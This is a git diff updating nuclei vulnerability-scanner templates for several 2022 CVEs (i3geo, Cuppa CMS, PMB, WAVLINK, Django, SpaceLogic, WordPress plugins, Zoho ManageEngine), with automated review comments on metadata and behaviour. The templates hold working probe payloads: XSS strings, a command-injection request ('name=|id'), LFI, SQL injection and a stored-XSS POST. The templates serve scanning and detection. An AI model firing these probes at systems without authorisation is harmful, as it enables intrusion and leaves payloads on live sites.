+ - https://github.com/ARPSyndicate/cvemon
 classification:
 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
 cvss-score: 6.1
 cve-id: CVE-2022-34093
 cwe-id: CWE-79
- epss-score: 0.00261
- epss-percentile: 0.63669
+ epss-score: 0.00266
+ epss-percentile: 0.65533
 cpe: cpe:2.3:a:softwarepublico:i3geo:7.0.5:*:*:*:*:*:*:*
 metadata:
 verified: true
 max-request: 1
 vendor: softwarepublico
 product: i3geo
- tags: cve,cve2022,i3geo,xss
+ tags: cve,cve2022,i3geo,xss,softwarepublico
 http:
 - method: GET
@@ -38,4 +39,4 @@ http:
 - 'contains(content_type, "text/html")'
 - 'contains_all(body, "%3Cscript%3Ealert(document.domain)%3C/script%3E", "Invalid consumer key")'
 condition: and
-# digest: 4b0a00483046022100ba421a094b5405c2df154ded3c6d3c4cef76af070583e1e95425e4625f055658022100c5996c8b475f50f29c1beadde4ea2385e6048f318a4ccb18620f1ca87292e7ca:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100b6c16f44954588e4bae35bb1d81fb7146230861817ce49f5a3de2f00e70a282a02204ac735c905d496f7e25c3534786304a13f57730db0a36a2c722fa4471bb64fa0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2022/CVE-2022-34094.yaml b/nuclei-templates/CVE-2022/CVE-2022-34094.yaml
index 2397f80f51..41df93a9f5 100644
--- a/nuclei-templates/CVE-2022/CVE-2022-34094.yaml
+++ b/nuclei-templates/CVE-2022/CVE-2022-34094.yaml
@@ -11,20 +11,21 @@ info:
 - https://nvd.nist.gov/vuln/detail/CVE-2022-34093
 - https://owasp.org/www-community/attacks/xss/
 - https://softwarepublico.gov.br/social/i3geo
+ - https://github.com/wagnerdracha/ProofOfConcept
 classification:
 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
 cvss-score: 6.1
 cve-id: CVE-2022-34094
 cwe-id: CWE-79
- epss-score: 0.00261
- epss-percentile: 0.63669
+ epss-score: 0.00266
+ epss-percentile: 0.65533
 cpe: cpe:2.3:a:softwarepublico:i3geo:7.0.5:*:*:*:*:*:*:*
 metadata:
 verified: true
 max-request: 1
 vendor: softwarepublico
 product: i3geo
- tags: cve,cve2022,i3geo,xss
+ tags: cve2022,cve,i3geo,xss,softwarepublico
 http:
 - method: GET
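Review bot: The `reference:` list of CVE-2022-34094 still links `https://nvd.nist.gov/vuln/detail/CVE-2022-34093`, the sibling CVE, while this hunk appends a further reference; the NVD entry for this template should be `https://nvd.nist.gov/vuln/detail/CVE-2022-34094`. The wrong link is a context line, so the commit carries the error forward rather than introducing it, but this is the natural moment to fix it since the reference list is being edited.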
@@ -38,4 +39,4 @@ http:
 - 'contains(content_type, "text/html")'
 - 'contains_all(body, "%3Cscript%3Ealert(document.domain)%3C/script%3E", "Invalid consumer key")'
 condition: and
-# digest: 4a0a00473045022100cca7d3036abd1b10ca87f783573b0b9a2abd2580718314465d3006bae2c006d202204c47a5aecd0fdebe9f7090b0dfab1a05a8770b87ffa85ee047b952d3897b8697:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100ae011287587c98e490b0c70b0c3ea88250a2b29a79c656693b056f3adbda9acd022035c0bf42383d419c05913b95afad80e3a7bf9eecc3689f24b92069aff39fc3af:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2022/CVE-2022-34121.yaml b/nuclei-templates/CVE-2022/CVE-2022-34121.yaml
index 3f232fdcd0..6c023aa399 100644
--- a/nuclei-templates/CVE-2022/CVE-2022-34121.yaml
+++ b/nuclei-templates/CVE-2022/CVE-2022-34121.yaml
@@ -6,20 +6,32 @@ info:
 severity: high
 description: |
 Cuppa CMS v1.0 is vulnerable to local file inclusion via the component /templates/default/html/windows/right.php.
+ impact: |
+ Successful exploitation of this vulnerability can lead to unauthorized access, sensitive information disclosure, and potential remote code execution.
+ remediation: |
+ Upgrade to the latest version of CuppaCMS or apply the provided patch to fix the LFI vulnerability.
 reference:
 - https://github.com/hansmach1ne/MyExploits/tree/main/LFI_in_CuppaCMS_templates
 - https://github.com/CuppaCMS/CuppaCMS/issues/18
 - https://nvd.nist.gov/vuln/detail/CVE-2022-34121
+ - https://github.com/ARPSyndicate/cvemon
+ - https://github.com/ARPSyndicate/kenzer-templates
 classification:
 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
 cvss-score: 7.5
 cve-id: CVE-2022-34121
 cwe-id: CWE-829
+ epss-score: 0.66943
+ epss-percentile: 0.97855
+ cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*
 metadata:
- verified: "true"
- tags: cve,cve2022,lfi,cuppa,cms
+ verified: true
+ max-request: 1
+ vendor: cuppacms
+ product: cuppacms
+ tags: cve,cve2022,lfi,cuppa,cms,cuppacms
-requests:
+http:
 - raw:
 - |
 POST /templates/default/html/windows/right.php HTTP/1.1
@@ -37,5 +49,4 @@ requests:
 - type: status
 status:
 - 200
-
-# Enhanced by mp on 2023/01/15
+# digest: 4b0a00483046022100c5726ce028ac359181e6ce2ccd45251d4715c1c9c936d2ef67b588f2159e7cc9022100c49a6fcb006b5de199ccc32a6d1716a713f8de4f24346ba4578c705b4f225245:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2022/CVE-2022-34265.yaml b/nuclei-templates/CVE-2022/CVE-2022-34265.yaml
deleted file mode 100644
index 676cc1637e..0000000000
--- a/nuclei-templates/CVE-2022/CVE-2022-34265.yaml
+++ /dev/null
@@ -1,45 +0,0 @@
-id: CVE-2022-34265
-
-info:
- name: Django - SQL injection
- author: princechaddha
- severity: critical
- description: |
- An issue was discovered in Django 3.2 before 3.2.14 and 4.0 before 4.0.6. The Trunc() and Extract() database functions are subject to SQL injection if untrusted data is used as a kind/lookup_name value. Applications that constrain the lookup name and kind choice to a known safe list are unaffected.
- reference:
- - https://github.com/vulhub/vulhub/tree/master/django/CVE-2022-34265
- - https://nvd.nist.gov/vuln/detail/CVE-2022-34265
- - https://www.djangoproject.com/weblog/2022/jul/04/security-releases/
- - https://docs.djangoproject.com/en/4.0/releases/security/
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 9.8
- cve-id: CVE-2022-34265
- cwe-id: CWE-89
- tags: sqli,dast,vulhub,cve,cve2022,django
-
-variables:
- rand_string: '{{rand_text_alpha(15, "abc")}}'
-
-http:
- - method: GET
- path:
- - "{{BaseURL}}"
-
- fuzzing:
- - part: query
- fuzz:
- - "test'{{rand_string}}"
-
- matchers-condition: and
- matchers:
- - type: word
- part: body
- words:
- - 'syntax error at or near "{{rand_string}}"'
- - 'LINE 1: SELECT DATE_TRUNC'
- condition: and
-
- - type: status
- status:
- - 500
diff --git a/nuclei-templates/CVE-2022/CVE-2022-34328.yaml b/nuclei-templates/CVE-2022/CVE-2022-34328.yaml
index 68443dab7f..0cb67471d4 100644
--- a/nuclei-templates/CVE-2022/CVE-2022-34328.yaml
+++ b/nuclei-templates/CVE-2022/CVE-2022-34328.yaml
@@ -6,21 +6,33 @@ info:
 severity: medium
 description: |
 PMB 7.3.10 contains a reflected cross-site scripting vulnerability via the id parameter in an lvl=author_see request to index.php.
+ impact: |
+ Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
+ remediation: |
+ Apply the latest security patch or upgrade to a non-vulnerable version of PMB.
 reference:
 - https://github.com/jenaye/PMB/blob/main/README.md
 - https://github.com/jenaye/PMB
 - https://nvd.nist.gov/vuln/detail/CVE-2022-34328
+ - https://github.com/ARPSyndicate/cvemon
+ - https://github.com/ARPSyndicate/kenzer-templates
 classification:
 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
 cvss-score: 6.1
 cve-id: CVE-2022-34328
 cwe-id: CWE-79
+ epss-score: 0.00088
+ epss-percentile: 0.36967
+ cpe: cpe:2.3:a:sigb:pmb:7.3.10:*:*:*:*:*:*:*
 metadata:
+ verified: true
+ max-request: 1
+ vendor: sigb
+ product: pmb
 shodan-query: http.html:"PMB Group"
- verified: "true"
- tags: cve,cve2022,pmb,xss
+ tags: cve,cve2022,pmb,xss,pmb_project
-requests:
+http:
 - method: GET
 path:
 - "{{BaseURL}}/index.php?lvl=author_see&id=42691%27%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
@@ -40,5 +52,4 @@ requests:
 - type: status
 status:
 - 200
-
-# Enhanced by mp on 2022/09/14
+# digest: 490a0046304402206bde39b421fc0dbe953ff2bb4c4414dd18a118d11c1854e21a49bfefa62df3f2022009445f47a0e787a6922487a2834e6903d60e5f80936db25397d553943d744fc0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2022/CVE-2022-34576.yaml b/nuclei-templates/CVE-2022/CVE-2022-34576.yaml
index 2ba3da4c7d..77c1005781 100644
--- a/nuclei-templates/CVE-2022/CVE-2022-34576.yaml
+++ b/nuclei-templates/CVE-2022/CVE-2022-34576.yaml
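Review bot: The new `tags` line for CVE-2022-34328 appends `pmb_project`, but the same hunk sets `vendor: sigb` and `cpe: cpe:2.3:a:sigb:pmb:7.3.10:…`; the other templates in this commit append the `vendor` value as the tag (`wwbn`, `plugins-market`, `cuppacms`, `schneider-electric`), so for consistency this should be `tags: cve,cve2022,pmb,xss,sigb`. Whichever name is intended, `vendor`, `cpe` and the tag should agree.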
@@ -6,19 +6,32 @@ info:
 severity: high
 description: |
 WAVLINK WN535 G3 M35G3R.V5030.180927 is susceptible to improper access control. A vulnerability in /cgi-bin/ExportAllSettings.sh allows an attacker to execute arbitrary code via a crafted POST request and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
+ impact: |
+ An attacker can exploit this vulnerability to gain unauthorized access to the router's settings and potentially compromise the network.
+ remediation: |
+ Apply the latest firmware update provided by the vendor to fix the access control issue.
 reference:
 - https://github.com/pghuanghui/CVE_Request/blob/main/WAVLINK%20WN535%20G3_Sensitive%20information%20leakage.md
 - https://nvd.nist.gov/vuln/detail/CVE-2022-34576
+ - https://github.com/ARPSyndicate/cvemon
+ - https://github.com/ARPSyndicate/kenzer-templates
+ - https://github.com/tr3ss/gofetch
 classification:
 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
 cvss-score: 7.5
 cve-id: CVE-2022-34576
+ epss-score: 0.03075
+ epss-percentile: 0.90796
+ cpe: cpe:2.3:o:wavlink:wn535g3_firmware:m35g3r.v5030.180927:*:*:*:*:*:*:*
 metadata:
+ verified: true
+ max-request: 1
+ vendor: wavlink
+ product: wn535g3_firmware
 shodan-query: http.html:"Wavlink"
- verified: "true"
 tags: cve,cve2022,wavlink,exposure
-requests:
+http:
 - method: GET
 path:
 - "{{BaseURL}}/cgi-bin/ExportAllSettings.sh"
@@ -36,5 +49,4 @@ requests:
 - type: status
 status:
 - 200
-
-# Enhanced by md on 2023/02/03
+# digest: 490a00463044022008737e106e5c8fe1e9e117f6bc57f005c3fb3b9810552455947f1568b74df85a022016b0f75b1b14036e1e8e1ce246588f322c3dbd791bc9db34ffead55bef452f8d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2022/CVE-2022-34590.yaml b/nuclei-templates/CVE-2022/CVE-2022-34590.yaml
index 639c5dc346..7ff5fdfdac 100644
--- a/nuclei-templates/CVE-2022/CVE-2022-34590.yaml
+++ b/nuclei-templates/CVE-2022/CVE-2022-34590.yaml
@@ -6,20 +6,33 @@ info:
 severity: high
 description: |
 Hospital Management System 1.0 contains a SQL injection vulnerability via the editid parameter in /HMS/admin.php. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
+ impact: |
+ Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
+ remediation: |
+ Upgrade to the latest version to mitigate this vulnerability.
 reference:
 - https://github.com/Renrao/bug_report/blob/master/blob/main/vendors/itsourcecode.com/hospital-management-system/sql_injection.md
 - https://nvd.nist.gov/vuln/detail/CVE-2022-34590
+ - https://github.com/ARPSyndicate/cvemon
+ - https://github.com/ARPSyndicate/kenzer-templates
+ - https://github.com/StarCrossPortal/scalpel
 classification:
 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
 cvss-score: 7.2
 cve-id: CVE-2022-34590
 cwe-id: CWE-89
+ epss-score: 0.01429
+ epss-percentile: 0.86269
+ cpe: cpe:2.3:a:hospital_management_system_project:hospital_management_system:1.0:*:*:*:*:*:*:*
 metadata:
+ verified: true
+ max-request: 1
+ vendor: hospital_management_system_project
+ product: hospital_management_system
 shodan-query: http.html:"Hospital Management System"
- verified: "true"
- tags: cve,cve2022,hms,cms,sqli
+ tags: cve,cve2022,hms,cms,sqli,hospital_management_system_project
-requests:
+http:
 - raw:
 - |
 POST /hms/admin/ HTTP/1.1
@@ -30,7 +43,7 @@ requests:
 host-redirects: true
 max-redirects: 2
- cookie-reuse: true
+
 matchers-condition: and
 matchers:
 - type: word
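Review bot: Removing `cookie-reuse: true` changes session handling for a raw POST to `/hms/admin/` that is allowed to follow up to two redirects (`host-redirects: true`, `max-redirects: 2`); if the match depends on the cookie set by the login response being replayed on the redirected request, the result now depends on the engine default. As far as I recall nuclei v3 reuses cookies by default and deprecated this key, so the removal is correct there, but an older engine would silently stop matching; a short comment on the `+` line such as `# cookie reuse is the engine default from nuclei v3; add cookie-reuse: true for v2` would make that intent explicit. The enclosing request block starts outside this hunk.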
@@ -44,5 +57,4 @@ requests:
 - type: status
 status:
 - 200
-
-# Enhanced by md on 2022/09/28
+# digest: 490a004630440220508a25e53992f71a0c0e1613f1df75afea7314115bd57f3048e91c9fc36ddf3802207ce3526546e9caca6a5e12a9b26fc0687f38a8f928ff84e751c99d5677ba4114:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2022/CVE-2022-34753.yaml b/nuclei-templates/CVE-2022/CVE-2022-34753.yaml
index 519fe2218b..1124ffaca8 100644
--- a/nuclei-templates/CVE-2022/CVE-2022-34753.yaml
+++ b/nuclei-templates/CVE-2022/CVE-2022-34753.yaml
@@ -1,26 +1,37 @@
 id: CVE-2022-34753
 info:
- name: SpaceLogic C-Bus Home Controller - Remote Code Execution
+ name: SpaceLogic C-Bus Home Controller <=1.31.460 - Remote Command Execution
 author: gy741
 severity: high
 description: |
- A CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability exists that could cause remote root exploit when the command is compromised. Affected Products SpaceLogic C-Bus Home Controller (5200WHC2), formerly known as C-Bus Wiser Homer Controller MK2 (V1.31.460 and prior)
+ SpaceLogic C-Bus Home Controller through 1.31.460 is susceptible to remote command execution via improper neutralization of special elements. Remote root exploit can be enabled when the command is compromised, and an attacker can potentially execute malware, obtain sensitive information, modify data, and/or gain full control without entering necessary credentials.
+ impact: |
+ Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected system.
+ remediation: |
+ Upgrade SpaceLogic C-Bus Home Controller to a version higher than 1.31.460 to mitigate this vulnerability.
 reference:
 - https://www.zeroscience.mk/codes/SpaceLogic.txt
- - https://nvd.nist.gov/vuln/detail/CVE-2022-34753
 - https://download.schneider-electric.com/files?p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2022-193-02_SpaceLogic-C-Bus-Home-Controller-Wiser_MK2_Security_Notification.pdf
 - http://packetstormsecurity.com/files/167783/Schneider-Electric-SpaceLogic-C-Bus-Home-Controller-5200WHC2-Remote-Root.html
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-34753
+ - https://github.com/nomi-sec/PoC-in-GitHub
 classification:
 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
 cvss-score: 8.8
 cve-id: CVE-2022-34753
 cwe-id: CWE-78
+ epss-score: 0.96923
+ epss-percentile: 0.99698
+ cpe: cpe:2.3:o:schneider-electric:spacelogic_c-bus_home_controller_firmware:*:*:*:*:*:*:*:*
 metadata:
+ max-request: 1
+ vendor: schneider-electric
+ product: spacelogic_c-bus_home_controller_firmware
 shodan-query: html:"SpaceLogic C-Bus"
- tags: cve,cve2022,iot,spacelogic,rce,oast,packetstorm
+ tags: cve2022,cve,iot,spacelogic,rce,oast,packetstorm,schneider-electric
-requests:
+http:
 - raw:
 - |
 GET /delsnap.pl?name=|id HTTP/1.1
@@ -36,3 +47,4 @@ requests:
 - type: status
 status:
 - 200
+# digest: 490a0046304402204b51d243c97f21fcb85beb1f317c06aee7975d29df11fb1cee0c2956fe0fd65b02204299ce2ca6106775b89d507ffec1d69bf0c776615de752889c3ebcc81abf06d2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2022/CVE-2022-3484.yaml b/nuclei-templates/CVE-2022/CVE-2022-3484.yaml
index 447388d541..8a6ae307d9 100644
--- a/nuclei-templates/CVE-2022/CVE-2022-3484.yaml
+++ b/nuclei-templates/CVE-2022/CVE-2022-3484.yaml
@@ -6,20 +6,32 @@ info: severity: medium description: | WordPress wpb-show-core plugin through TODO contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data theft, and potential compromise of the affected WordPress website. + remediation: | + Update to the latest version of the WPB Show Core plugin, which includes a fix for the XSS vulnerability. reference: - https://wpscan.com/vulnerability/3afaed61-6187-4915-acf0-16e79d5c2464 - https://nvd.nist.gov/vuln/detail/CVE-2022-3484 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-3484 cwe-id: CWE-79 + epss-score: 0.00119 + epss-percentile: 0.45981 + cpe: cpe:2.3:a:wpb_show_core_project:wpb_show_core:-:*:*:*:*:wordpress:*:* metadata: verified: true + max-request: 1 + vendor: wpb_show_core_project + product: wpb_show_core + framework: wordpress google-query: inurl:wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php - tags: wpscan,cve,cve2022,wp-plugin,wp,wordpress,xss,wpb-show-core + tags: cve,cve2022,wpscan,wp-plugin,wp,wordpress,xss,wpb-show-core,wpb_show_core_project -requests: +http: - method: GET path: - '{{BaseURL}}/wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php?audioPlayerOption=1&fileList[0][title]=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' 
@@ -32,5 +44,4 @@ requests: - 'contains(body, "wpb_jplayer_setting")' - 'contains(body, "")' condition: and - -# Enhanced by md on 2022/12/13 +# digest: 490a0046304402201a749cdffd411187ddb33010e8f5216620153b04b07fa73fc4fc631a83f40fb2022002510fd3818a0349b4e36bb35d207c52445a1777f8df6d4ef0baf5cb38af6080:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-3506.yaml b/nuclei-templates/CVE-2022/CVE-2022-3506.yaml index be43c1c809..d6fd9106bc 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-3506.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-3506.yaml @@ -6,6 +6,10 @@ info: severity: medium description: | WordPress Related Posts plugin prior to 2.1.3 contains a cross-site scripting vulnerability in the rp4wp[heading_text] parameter. User input is not properly sanitized, allowing the insertion of arbitrary code that can allow an attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, potentially leading to unauthorized access, data theft, or defacement. + remediation: | + Update to the latest version of the WordPress Related Posts plugin (2.1.3 or higher) to mitigate the vulnerability. reference: - https://huntr.dev/bounties/08251542-88f6-4264-9074-a89984034828/ - https://huntr.dev/bounties/08251542-88f6-4264-9074-a89984034828 @@ -16,11 +20,18 @@ info: cvss-score: 5.4 cve-id: CVE-2022-3506 cwe-id: CWE-79 + epss-score: 0.00135 + epss-percentile: 0.48543 + cpe: cpe:2.3:a:never5:related_posts:*:*:*:*:*:wordpress:*:* metadata: - verified: "true" - tags: wordpress,wp,wp-plugin,relatedposts,cve,cve2022,xss,authenticated,huntr + verified: true + max-request: 4 + vendor: never5 + product: related_posts + framework: wordpress + tags: cve2022,cve,wordpress,wp,wp-plugin,relatedposts,xss,authenticated,huntr,never5 -requests: +http: - raw: - | POST /wp-login.php HTTP/1.1 
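Review bot: The new `remediation` ("Update to the latest version of the WPB Show Core plugin, which includes a fix") sits under a `description` that still reads `WordPress wpb-show-core plugin through TODO`, and the `cpe` added in the same hunk uses version `-`, so the template now asserts a fix exists without naming an affected or fixed release. If the WPScan entry does not list a patched version, the honest text is `No fixed version is known; disable or remove the WPB Show Core plugin.`; either way the `TODO` placeholder should be resolved or the phrase dropped so it does not reach scan output.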
@@ -28,28 +39,23 @@ requests: Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In - - | GET /wp-admin/options-general.php?page=rp4wp HTTP/1.1 Host: {{Hostname}} - - | POST /wp-admin/options.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded option_page=rp4wp&action=update&_wpnonce={{nonce}}&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Drp4wp&rp4wp%5Bautomatic_linking%5D=1&rp4wp%5Bautomatic_linking_post_amount%5D=3&rp4wp%5Bheading_text%5D=%22+autofocus+onfocus%3Dalert%28document.domain%29%3E&rp4wp%5Bexcerpt_length%5D=15&rp4wp%5Bcss%5D=.rp4wp-related-posts+ul%7Bwidth%3A100%25%3Bpadding%3A0%3Bmargin%3A0%3Bfloat%3Aleft%3B%7D%0D%0A.rp4wp-related-posts+ul%3Eli%7Blist-style%3Anone%3Bpadding%3A0%3Bmargin%3A0%3Bpadding-bottom%3A20px%3Bclear%3Aboth%3B%7D%0D%0A.rp4wp-related-posts+ul%3Eli%3Ep%7Bmargin%3A0%3Bpadding%3A0%3B%7D%0D%0A.rp4wp-related-post-image%7Bwidth%3A35%25%3Bpadding-right%3A25px%3B-moz-box-sizing%3Aborder-box%3B-webkit-box-sizing%3Aborder-box%3Bbox-sizing%3Aborder-box%3Bfloat%3Aleft%3B%7D - - | GET /wp-admin/options-general.php?page=rp4wp&settings-updated=true HTTP/1.1 Host: {{Hostname}} - cookie-reuse: true - req-condition: true matchers: - type: dsl dsl: - - "contains(all_headers_4, 'text/html')" + - "contains(header_4, 'text/html')" - "status_code_4 == 200" - 'contains(body_4, "value=\"\" autofocus onfocus=alert(document.domain)>")' - "contains(body_4, 'The amount of automatically')" @@ -58,10 +64,9 @@ requests: extractors: - type: regex name: nonce - part: body group: 1 regex: - 'name="_wpnonce" value="([0-9a-z]+)" />' internal: true - -# Enhanced by md on 2022/12/13 + part: body +# digest: 490a004630440220183c07929c3a6fa76dbd9ae9c9682952d3b03b59c1ff34cf40687d299cfb671b022070f05c9efb0883a2b4afd38a695f1868ab9b6e7d4d0a3356e1fc0e8be2a02643:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
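Review bot: The third raw request (`POST /wp-admin/options.php` with `rp4wp[heading_text]=" autofocus onfocus=alert(document.domain)>`) persists the XSS payload in the plugin's stored options and nothing in the template restores the previous heading, so every page rendering the related-posts block on the scanned site keeps serving the payload after the scan. The tag line updated in this file adds `never5` but not `intrusive`, which is what lets operators exclude state-changing templates with `-etags intrusive`; suggest `tags: ...,authenticated,huntr,never5,intrusive` plus either a final request that resets `rp4wp[heading_text]` or a comment stating that cleanup is manual. Dropping `cookie-reuse: true` and `req-condition: true` is only safe on nuclei versions where those are the default for raw requests, so the minimum version this repository targets should be confirmed.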
diff --git a/nuclei-templates/CVE-2022/CVE-2022-35151.yaml b/nuclei-templates/CVE-2022/CVE-2022-35151.yaml index 199aaeadd9..04519a5b18 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-35151.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-35151.yaml @@ -6,20 +6,33 @@ info: severity: medium description: | kkFileView 4.1.0 contains multiple cross-site scripting vulnerabilities via the urls and currentUrl parameters at /controller/OnlinePreviewController.java. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement. + remediation: | + To mitigate this vulnerability, it is recommended to update kkFileView to the latest version or apply a patch provided by the vendor. reference: - https://github.com/kekingcn/kkFileView/issues/366 - https://nvd.nist.gov/vuln/detail/CVE-2022-35151 + - https://github.com/StarCrossPortal/scalpel + - https://github.com/anonymous364872/Rapier_Tool + - https://github.com/youcans896768/APIV_Tool classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-35151 cwe-id: CWE-79 + epss-score: 0.02148 + epss-percentile: 0.8906 + cpe: cpe:2.3:a:keking:kkfileview:4.1.0:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: keking + product: kkfileview shodan-query: http.html:"kkFileView" - verified: "true" - tags: cve,cve2022,xss,kkfileview + tags: cve,cve2022,xss,kkfileview,keking -requests: +http: - raw: - | GET /picturesPreview?urls=aHR0cDovLzEyNy4wLjAuMS8xLnR4dCI%2BPHN2Zy9vbmxvYWQ9YWxlcnQoZG9jdW1lbnQuZG9tYWluKT4%3D HTTP/1.1 
@@ -42,5 +55,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/09/14 +# digest: 4b0a00483046022100ea88299ec85fb50b4a362a8e064bc821fb7715a7759f1eeca4e1cf413f0660ed022100fe6573babba0d9c0edfa96f41ecf1d52e2520195df629fdc83d76427c3b9eef7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-35405.yaml b/nuclei-templates/CVE-2022/CVE-2022-35405.yaml index 2da0529eff..b93c5d5cd7 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-35405.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-35405.yaml @@ -6,6 +6,10 @@ info: severity: critical description: | Zoho ManageEngine Password Manager Pro, PAM 360, and Access Manager Plus are susceptible to unauthenticated remote code execution via XML-RPC. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. + remediation: | + Apply the latest security patch or update provided by Zoho ManageEngine to fix the vulnerability. reference: - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/zoho_password_manager_pro_xml_rpc_rce.rb - https://xz.aliyun.com/t/11578 
@@ -16,36 +20,25 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-35405 + cwe-id: CWE-502 + epss-score: 0.97471 + epss-percentile: 0.99962 + cpe: cpe:2.3:a:zohocorp:manageengine_access_manager_plus:*:*:*:*:*:*:*:* metadata: + max-request: 1 + vendor: zohocorp + product: manageengine_access_manager_plus shodan-query: http.title:"ManageEngine" - tags: cve,cve2022,rce,zoho,passwordmanager,deserialization,unauth,msf,kev + tags: cve,cve2022,rce,zoho,passwordmanager,deserialization,unauth,msf,kev,zohocorp -requests: +http: - method: POST path: - "{{RootURL}}/xmlrpc" - body: | - {{randstr}}big0us - - - method: POST - path: - - "{{RootURL}}:8282/xmlrpc" - body: | - {{randstr}}big0us - - - method: POST - path: - - "{{RootURL}}:9292/xmlrpc" - body: | - {{randstr}}big0us - - method: POST - path: - - "{{RootURL}}:7272/xmlrpc" body: | - {{randstr}}big0us + {{randstr}}big0us - stop-at-first-match: true matchers-condition: and matchers: - type: word @@ -66,5 +59,4 @@ requests: - "" - "" condition: or - -# Enhanced by mp on 2022/10/06 +# digest: 4a0a00473045022100c58308205018e15f25ac2f7d5c893f96e4824a583109c18b69b936c1d0a70a2b022071a1f6412c2a7b759bc7b80ca525682bca892b4f239f9c1dd42aa27dafc7221e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-35413.yaml b/nuclei-templates/CVE-2022/CVE-2022-35413.yaml index 4aa84e7310..6dd5baad96 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-35413.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-35413.yaml 
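Review bot: The rewritten `http` section keeps only `{{RootURL}}/xmlrpc` and drops the three further requests to `:8282`, `:9292` and `:7272`, presumably the default listeners of the three ManageEngine products the description covers, so with `max-request: 1` the template now fires only when the target URL already carries the right port. If port discovery is meant to live in the target list rather than the template, a comment saying so would stop the next maintainer re-adding them, e.g. `# PMP/PAM360/AMP listen on 7272/8282/9292 by default; supply the port in the target URL`. The added `cpe` names only `manageengine_access_manager_plus` while the description and tags cover Password Manager Pro and PAM360 as well; a note on why one product was chosen, or additional entries, would keep the metadata consistent.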
